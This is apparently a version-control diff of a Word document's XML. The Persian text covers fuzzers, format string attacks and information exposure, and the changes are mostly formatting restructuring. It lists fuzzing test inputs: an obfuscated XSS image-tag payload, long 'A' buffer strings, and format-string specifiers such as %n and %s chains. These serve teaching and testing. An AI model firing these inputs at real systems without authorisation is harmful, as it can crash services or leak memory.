-        <w:t>(&lt;WBR&gt;'XSS');"&gt;</w:t>
+        <w:t>&lt;IMG SRC="jav&amp;#x0D;ascript:alert(&lt;WBR&gt;'XSS');"&gt;</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -35946,7 +34287,6 @@
         </w:rPr>
         <w:t xml:space="preserve"> برنامه </w:t>
       </w:r>
-      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cs="B Nazanin"/>
@@ -35957,7 +34297,6 @@
         </w:rPr>
         <w:t>fuzzer</w:t>
       </w:r>
-      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cs="B Nazanin"/>
@@ -36023,52 +34362,49 @@
           <w:lang w:bidi="fa-IR"/>
         </w:rPr>
       </w:pPr>
-      <w:proofErr w:type="gramStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
           <w:color w:val="000000" w:themeColor="text1"/>
           <w:lang w:bidi="fa-IR"/>
         </w:rPr>
-        <w:lastRenderedPageBreak/>
-        <w:t>A</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
+        <w:t xml:space="preserve">A x 5 </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
         <w:rPr>
           <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
           <w:color w:val="000000" w:themeColor="text1"/>
-          <w:lang w:bidi="fa-IR"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> x 5 </w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
+          <w:rtl/>
+          <w:lang w:bidi="fa-IR"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
           <w:color w:val="000000" w:themeColor="text1"/>
-          <w:rtl/>
-          <w:lang w:bidi="fa-IR"/>
-        </w:rPr>
-      </w:pPr>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
+          <w:lang w:bidi="fa-IR"/>
+        </w:rPr>
+        <w:t xml:space="preserve">A x 17 </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
         <w:rPr>
           <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
           <w:color w:val="000000" w:themeColor="text1"/>
-          <w:lang w:bidi="fa-IR"/>
-        </w:rPr>
-        <w:t>A</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
+          <w:rtl/>
+          <w:lang w:bidi="fa-IR"/>
+        </w:rPr>
+      </w:pPr>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
           <w:color w:val="000000" w:themeColor="text1"/>
           <w:lang w:bidi="fa-IR"/>
         </w:rPr>
-        <w:t xml:space="preserve"> x 17 </w:t>
+        <w:t xml:space="preserve">A x 33 </w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -36080,51 +34416,49 @@
           <w:lang w:bidi="fa-IR"/>
         </w:rPr>
       </w:pPr>
-      <w:proofErr w:type="gramStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
           <w:color w:val="000000" w:themeColor="text1"/>
           <w:lang w:bidi="fa-IR"/>
         </w:rPr>
-        <w:t>A</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
+        <w:t xml:space="preserve">A x 65 </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
         <w:rPr>
           <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
           <w:color w:val="000000" w:themeColor="text1"/>
-          <w:lang w:bidi="fa-IR"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> x 33 </w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
+          <w:rtl/>
+          <w:lang w:bidi="fa-IR"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
           <w:color w:val="000000" w:themeColor="text1"/>
-          <w:rtl/>
-          <w:lang w:bidi="fa-IR"/>
-        </w:rPr>
-      </w:pPr>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
+          <w:lang w:bidi="fa-IR"/>
+        </w:rPr>
+        <w:t xml:space="preserve">A x 129 </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
         <w:rPr>
           <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
           <w:color w:val="000000" w:themeColor="text1"/>
-          <w:lang w:bidi="fa-IR"/>
-        </w:rPr>
-        <w:t>A</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
+          <w:rtl/>
+          <w:lang w:bidi="fa-IR"/>
+        </w:rPr>
+      </w:pPr>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
           <w:color w:val="000000" w:themeColor="text1"/>
           <w:lang w:bidi="fa-IR"/>
         </w:rPr>
-        <w:t xml:space="preserve"> x 65 </w:t>
+        <w:t xml:space="preserve">A x 257 </w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -36136,51 +34470,49 @@
           <w:lang w:bidi="fa-IR"/>
         </w:rPr>
       </w:pPr>
-      <w:proofErr w:type="gramStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
           <w:color w:val="000000" w:themeColor="text1"/>
           <w:lang w:bidi="fa-IR"/>
         </w:rPr>
-        <w:t>A</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
+        <w:t xml:space="preserve">A x 513 </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
         <w:rPr>
           <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
           <w:color w:val="000000" w:themeColor="text1"/>
-          <w:lang w:bidi="fa-IR"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> x 129 </w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
+          <w:rtl/>
+          <w:lang w:bidi="fa-IR"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
           <w:color w:val="000000" w:themeColor="text1"/>
-          <w:rtl/>
-          <w:lang w:bidi="fa-IR"/>
-        </w:rPr>
-      </w:pPr>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
+          <w:lang w:bidi="fa-IR"/>
+        </w:rPr>
+        <w:t xml:space="preserve">A x 1024 </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
         <w:rPr>
           <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
           <w:color w:val="000000" w:themeColor="text1"/>
-          <w:lang w:bidi="fa-IR"/>
-        </w:rPr>
-        <w:t>A</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
+          <w:rtl/>
+          <w:lang w:bidi="fa-IR"/>
+        </w:rPr>
+      </w:pPr>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
           <w:color w:val="000000" w:themeColor="text1"/>
           <w:lang w:bidi="fa-IR"/>
         </w:rPr>
-        <w:t xml:space="preserve"> x 257 </w:t>
+        <w:t xml:space="preserve">A x 2049 </w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -36192,163 +34524,49 @@
           <w:lang w:bidi="fa-IR"/>
         </w:rPr>
       </w:pPr>
-      <w:proofErr w:type="gramStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
           <w:color w:val="000000" w:themeColor="text1"/>
           <w:lang w:bidi="fa-IR"/>
         </w:rPr>
-        <w:t>A</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
+        <w:t xml:space="preserve">A x 4097 </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
         <w:rPr>
           <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
           <w:color w:val="000000" w:themeColor="text1"/>
-          <w:lang w:bidi="fa-IR"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> x 513 </w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
+          <w:rtl/>
+          <w:lang w:bidi="fa-IR"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
           <w:color w:val="000000" w:themeColor="text1"/>
-          <w:rtl/>
-          <w:lang w:bidi="fa-IR"/>
-        </w:rPr>
-      </w:pPr>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
+          <w:lang w:bidi="fa-IR"/>
+        </w:rPr>
+        <w:t xml:space="preserve">A x 8193 </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
         <w:rPr>
           <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
           <w:color w:val="000000" w:themeColor="text1"/>
-          <w:lang w:bidi="fa-IR"/>
-        </w:rPr>
-        <w:t>A</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
+          <w:rtl/>
+          <w:lang w:bidi="fa-IR"/>
+        </w:rPr>
+      </w:pPr>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
           <w:color w:val="000000" w:themeColor="text1"/>
           <w:lang w:bidi="fa-IR"/>
         </w:rPr>
-        <w:t xml:space="preserve"> x 1024 </w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:color w:val="000000" w:themeColor="text1"/>
-          <w:rtl/>
-          <w:lang w:bidi="fa-IR"/>
-        </w:rPr>
-      </w:pPr>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:color w:val="000000" w:themeColor="text1"/>
-          <w:lang w:bidi="fa-IR"/>
-        </w:rPr>
-        <w:t>A</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:color w:val="000000" w:themeColor="text1"/>
-          <w:lang w:bidi="fa-IR"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> x 2049 </w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:color w:val="000000" w:themeColor="text1"/>
-          <w:rtl/>
-          <w:lang w:bidi="fa-IR"/>
-        </w:rPr>
-      </w:pPr>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:color w:val="000000" w:themeColor="text1"/>
-          <w:lang w:bidi="fa-IR"/>
-        </w:rPr>
-        <w:t>A</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:color w:val="000000" w:themeColor="text1"/>
-          <w:lang w:bidi="fa-IR"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> x 4097 </w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:color w:val="000000" w:themeColor="text1"/>
-          <w:rtl/>
-          <w:lang w:bidi="fa-IR"/>
-        </w:rPr>
-      </w:pPr>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:color w:val="000000" w:themeColor="text1"/>
-          <w:lang w:bidi="fa-IR"/>
-        </w:rPr>
-        <w:t>A</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:color w:val="000000" w:themeColor="text1"/>
-          <w:lang w:bidi="fa-IR"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> x 8193 </w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:color w:val="000000" w:themeColor="text1"/>
-          <w:rtl/>
-          <w:lang w:bidi="fa-IR"/>
-        </w:rPr>
-      </w:pPr>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:color w:val="000000" w:themeColor="text1"/>
-          <w:lang w:bidi="fa-IR"/>
-        </w:rPr>
-        <w:t>A</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:color w:val="000000" w:themeColor="text1"/>
-          <w:lang w:bidi="fa-IR"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> x 12288</w:t>
+        <w:t>A x 12288</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -36403,6 +34621,7 @@
           <w:rtl/>
           <w:lang w:bidi="fa-IR"/>
         </w:rPr>
+        <w:lastRenderedPageBreak/>
         <w:t>حملات رشته فرمت طبقه ا</w:t>
       </w:r>
       <w:r>
@@ -37113,7 +35332,6 @@
         </w:rPr>
         <w:t xml:space="preserve"> برنامه </w:t>
       </w:r>
-      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cs="B Nazanin"/>
@@ -37123,7 +35341,6 @@
         </w:rPr>
         <w:t>fuzzer</w:t>
       </w:r>
-      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cs="B Nazanin"/>
@@ -37252,23 +35469,23 @@
           <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
           <w:lang w:bidi="fa-IR"/>
         </w:rPr>
-        <w:t>%</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
+        <w:t xml:space="preserve">%p%p%p%p </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
         <w:rPr>
           <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:lang w:bidi="fa-IR"/>
-        </w:rPr>
-        <w:t>p%p%p%p</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
+          <w:rtl/>
+          <w:lang w:bidi="fa-IR"/>
+        </w:rPr>
+      </w:pPr>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
           <w:lang w:bidi="fa-IR"/>
         </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
+        <w:t xml:space="preserve">%x%x%x%x </w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -37284,23 +35501,23 @@
           <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
           <w:lang w:bidi="fa-IR"/>
         </w:rPr>
-        <w:t>%</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
+        <w:t xml:space="preserve">%d%d%d%d </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
         <w:rPr>
           <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:lang w:bidi="fa-IR"/>
-        </w:rPr>
-        <w:t>x%x%x%x</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
+          <w:rtl/>
+          <w:lang w:bidi="fa-IR"/>
+        </w:rPr>
+      </w:pPr>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
           <w:lang w:bidi="fa-IR"/>
         </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
+        <w:t xml:space="preserve">%s%s%s%s </w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -37316,23 +35533,23 @@
           <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
           <w:lang w:bidi="fa-IR"/>
         </w:rPr>
-        <w:t>%</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
+        <w:t xml:space="preserve">%99999999999s </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
         <w:rPr>
           <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:lang w:bidi="fa-IR"/>
-        </w:rPr>
-        <w:t>d%d%d%d</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
+          <w:rtl/>
+          <w:lang w:bidi="fa-IR"/>
+        </w:rPr>
+      </w:pPr>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
           <w:lang w:bidi="fa-IR"/>
         </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
+        <w:t xml:space="preserve">%08x </w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -37348,23 +35565,23 @@
           <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
           <w:lang w:bidi="fa-IR"/>
         </w:rPr>
-        <w:t>%</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
+        <w:t xml:space="preserve">%%20d </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
         <w:rPr>
           <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:lang w:bidi="fa-IR"/>
-        </w:rPr>
-        <w:t>s%s%s%s</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
+          <w:rtl/>
+          <w:lang w:bidi="fa-IR"/>
+        </w:rPr>
+      </w:pPr>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
           <w:lang w:bidi="fa-IR"/>
         </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
+        <w:t xml:space="preserve">%%20n </w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -37380,7 +35597,7 @@
           <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
           <w:lang w:bidi="fa-IR"/>
         </w:rPr>
-        <w:t xml:space="preserve">%99999999999s </w:t>
+        <w:t xml:space="preserve">%%20x </w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -37396,7 +35613,7 @@
           <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
           <w:lang w:bidi="fa-IR"/>
         </w:rPr>
-        <w:t xml:space="preserve">%08x </w:t>
+        <w:t xml:space="preserve">%%20s </w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -37412,8 +35629,7 @@
           <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
           <w:lang w:bidi="fa-IR"/>
         </w:rPr>
-        <w:lastRenderedPageBreak/>
-        <w:t xml:space="preserve">%%20d </w:t>
+        <w:t xml:space="preserve">%s%s%s%s%s%s%s%s%s%s </w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -37429,119 +35645,7 @@
           <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
           <w:lang w:bidi="fa-IR"/>
         </w:rPr>
-        <w:t xml:space="preserve">%%20n </w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:rtl/>
-          <w:lang w:bidi="fa-IR"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:lang w:bidi="fa-IR"/>
-        </w:rPr>
-        <w:t xml:space="preserve">%%20x </w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:rtl/>
-          <w:lang w:bidi="fa-IR"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:lang w:bidi="fa-IR"/>
-        </w:rPr>
-        <w:t xml:space="preserve">%%20s </w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:rtl/>
-          <w:lang w:bidi="fa-IR"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:lang w:bidi="fa-IR"/>
-        </w:rPr>
-        <w:t>%</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:lang w:bidi="fa-IR"/>
-        </w:rPr>
-        <w:t>s%s%s%s%s%s%s%s%s%s</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:lang w:bidi="fa-IR"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:rtl/>
-          <w:lang w:bidi="fa-IR"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:lang w:bidi="fa-IR"/>
-        </w:rPr>
-        <w:t>%</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:lang w:bidi="fa-IR"/>
-        </w:rPr>
-        <w:t>p%p%p%p%p%p%p%p%p%p</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:lang w:bidi="fa-IR"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> %#0123456x%08x%x%s%p%d%n%o%u%c%h%l%q%j%z%Z%t%i%e%g%f%a%C%S%08x%% %s x 129 %x </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:lang w:bidi="fa-IR"/>
-        </w:rPr>
-        <w:t>x</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:lang w:bidi="fa-IR"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> 257</w:t>
+        <w:t>%p%p%p%p%p%p%p%p%p%p %#0123456x%08x%x%s%p%d%n%o%u%c%h%l%q%j%z%Z%t%i%e%g%f%a%C%S%08x%% %s x 129 %x x 257</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -38309,6 +36413,7 @@
           <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
           <w:lang w:bidi="fa-IR"/>
         </w:rPr>
+        <w:lastRenderedPageBreak/>
         <w:t xml:space="preserve">0x1000 </w:t>
       </w:r>
     </w:p>
@@ -38498,7 +36603,6 @@
           <w:rtl/>
           <w:lang w:bidi="fa-IR"/>
         </w:rPr>
-        <w:lastRenderedPageBreak/>
         <w:t>ا</w:t>
       </w:r>
       <w:r>
@@ -38851,7 +36955,6 @@
         </w:rPr>
         <w:t xml:space="preserve"> </w:t>
       </w:r>
-      <w:proofErr w:type="gramStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cs="B Nazanin"/>
@@ -38879,9 +36982,18 @@
           <w:rtl/>
           <w:lang w:bidi="fa-IR"/>
         </w:rPr>
-        <w:t xml:space="preserve"> بسته</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
+        <w:t xml:space="preserve"> بسته به </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cs="B Nazanin"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:rtl/>
+          <w:lang w:bidi="fa-IR"/>
+        </w:rPr>
+        <w:t>در معرض اطلاعات پا</w:t>
+      </w:r>
       <w:r>
         <w:rPr>
           <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cs="B Nazanin" w:hint="cs"/>
@@ -38890,17 +37002,27 @@
           <w:rtl/>
           <w:lang w:bidi="fa-IR"/>
         </w:rPr>
-        <w:t xml:space="preserve"> به </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cs="B Nazanin"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:rtl/>
-          <w:lang w:bidi="fa-IR"/>
-        </w:rPr>
-        <w:t>در معرض اطلاعات پا</w:t>
+        <w:t>ی</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cs="B Nazanin" w:hint="eastAsia"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:rtl/>
+          <w:lang w:bidi="fa-IR"/>
+        </w:rPr>
+        <w:t>گاه</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cs="B Nazanin"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:rtl/>
+          <w:lang w:bidi="fa-IR"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> داده</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -38910,6 +37032,26 @@
           <w:rtl/>
           <w:lang w:bidi="fa-IR"/>
         </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cs="B Nazanin"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:rtl/>
+          <w:lang w:bidi="fa-IR"/>
+        </w:rPr>
+        <w:t>قرار گرفتن (غ</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cs="B Nazanin" w:hint="cs"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:rtl/>
+          <w:lang w:bidi="fa-IR"/>
+        </w:rPr>
         <w:t>ی</w:t>
       </w:r>
       <w:r>
@@ -38920,6 +37062,96 @@
           <w:rtl/>
           <w:lang w:bidi="fa-IR"/>
         </w:rPr>
+        <w:t>رفعال</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cs="B Nazanin"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:rtl/>
+          <w:lang w:bidi="fa-IR"/>
+        </w:rPr>
+        <w:t xml:space="preserve">) </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cs="B Nazanin" w:hint="cs"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:rtl/>
+          <w:lang w:bidi="fa-IR"/>
+        </w:rPr>
+        <w:t>ی</w:t>
+      </w:r>
+      <w:r>
